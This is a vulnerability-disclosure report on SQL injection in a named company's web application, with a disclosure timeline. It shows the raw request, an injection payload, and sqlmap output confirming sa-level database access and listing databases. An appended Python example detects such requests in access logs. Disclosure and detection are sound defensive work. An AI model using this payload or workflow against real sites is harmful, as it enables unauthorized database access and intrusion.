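2015-11-19: Details reported to the vendor; awaiting vendor handling
2015-11-20: Vendor confirmed; details disclosed to the vendor only
2015-11-30: Details disclosed to core white hats and experts in related fields
2015-12-10: Details disclosed to regular white hats
2015-12-20: Details disclosed to trainee white hats
2015-12-25: Vendor fixed the vulnerability and proactively disclosed it; details disclosed to the public

The deptID parameter on cmncu.minmetals.com.cn is injectable and runs with sa privileges, which allows command execution and planting a trojan, and from there penetration of the internal network.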
GET /copper/access.do?deptID=1&method=testUserNameInDept&userName=e HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://cmncu.minmetals.com.cn
Cookie: JSESSIONID=06CC83DCF2449052416FA78144E25D83
Host: cmncu.minmetals.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: deptID (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: deptID=-3287 OR 1375=1375-- jrlc&method=testUserNameInDept&userName=e
---
[04:34:35] [INFO] testing Microsoft SQL Server
[04:34:35] [INFO] confirming Microsoft SQL Server
[04:34:35] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: Servlet 2.4, Tomcat 4.2.3.
back-end DBMS: Microsoft SQL Server 2012
[04:34:35] [INFO] fetching current user
[04:34:35] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[04:34:35] [INFO] retrieved: sa
current user: 'sa'
[04:34:40] [INFO] fetching database names
[04:34:40] [INFO] fetching number of databases
[04:34:40] [INFO] resumed: 14
[04:34:40] [INFO] resumed: copper
[04:34:40] [INFO] resumed: copper_test
[04:34:40] [INFO] resumed: cu
[04:34:40] [INFO] resumed: cunm
[04:34:40] [INFO] resumed: KinmetFutures
[04:34:40] [INFO] resumed: master
[04:34:40] [INFO] resumed: model
[04:34:40] [INFO] resumed: msdb
[04:34:40] [INFO] resumed: Northwind
[04:34:40] [INFO] resumed: pubs
[04:34:40] [INFO] resumed: tempdb
[04:34:40] [INFO] resumed: tin
[04:34:40] [INFO] resumed: tin_test
[04:34:40] [INFO] resumed: wxcopper_kf
available databases [14]:
[*] copper
[*] copper_test
[*] cu
[*] cunm
[*] KinmetFutures
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] tin
[*] tin_test
[*] wxcopper_kf
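Severity: High
Vulnerability Rank: 10
Confirmed: 2015-11-20 15:34
Thank you to the white hat; the vulnerability is being handled.
2015-11-23: The vulnerability has been fixed.
2015-12-25: The vulnerability has been fixed.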
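
The deptID injection reported above, seen from the defender's side: an added example, not part of the original report or the vendor's code, that applies an allow-list check to deptID and uses it to flag suspicious requests in a web access log. The endpoint and parameter names come from the request in the report; that deptID is meant to be a plain integer is an assumption based on the deptID=1 in that request, and the log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter names are taken from the report; the rest is assumed.
ENDPOINT = "/copper/access.do"
NUMERIC_PARAMS = ("deptID",)  # assumption: deptID is a plain integer id
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (not taken from the original report).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Nov/2015:04:30:01 +0800] "GET /copper/access.do?deptID=1&method=testUserNameInDept&userName=e HTTP/1.1" 200 12',
    '192.0.2.77 - - [19/Nov/2015:04:34:35 +0800] "GET /copper/access.do?deptID=-3287%20OR%201375%3D1375--%20jrlc&method=testUserNameInDept&userName=e HTTP/1.1" 200 12',
    '192.0.2.10 - - [19/Nov/2015:04:35:02 +0800] "GET /copper/access.do?deptID=7&deptID=7%27&method=testUserNameInDept HTTP/1.1" 200 12',
    '192.0.2.10 - - [19/Nov/2015:04:36:00 +0800] "GET /copper/index.do?deptID=abc HTTP/1.1" 200 300',
]


def is_valid_dept_id(value):
    """Allow-list check: the value must be a short run of ASCII digits."""
    return re.fullmatch(r"[0-9]{1,9}", value) is not None


def suspicious_requests(lines):
    """Return (line_number, parameter, decoded_value) for each non-numeric value."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if url.path != ENDPOINT:
            continue
        # parse_qs URL-decodes values and keeps repeated parameters as a list,
        # so a second deptID hidden behind a benign first one is still checked.
        params = parse_qs(url.query, keep_blank_values=True)
        for name in NUMERIC_PARAMS:
            for value in params.get(name, []):
                if not is_valid_dept_id(value):
                    hits.append((number, name, value))
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

The same allow-list check belongs in the servlet before the value reaches the database, together with a parameterized query and a database login that is not sa.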